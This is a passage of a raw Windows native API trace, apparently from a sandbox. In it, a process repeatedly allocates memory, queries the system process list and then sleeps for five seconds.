NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.217] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.234] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.249] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.262] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.278] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.296] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.310] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.326] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.341] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.358] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.372] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.388] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.406] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.419] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.434] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.450] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.465] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.481] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.498] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.513] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.528] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 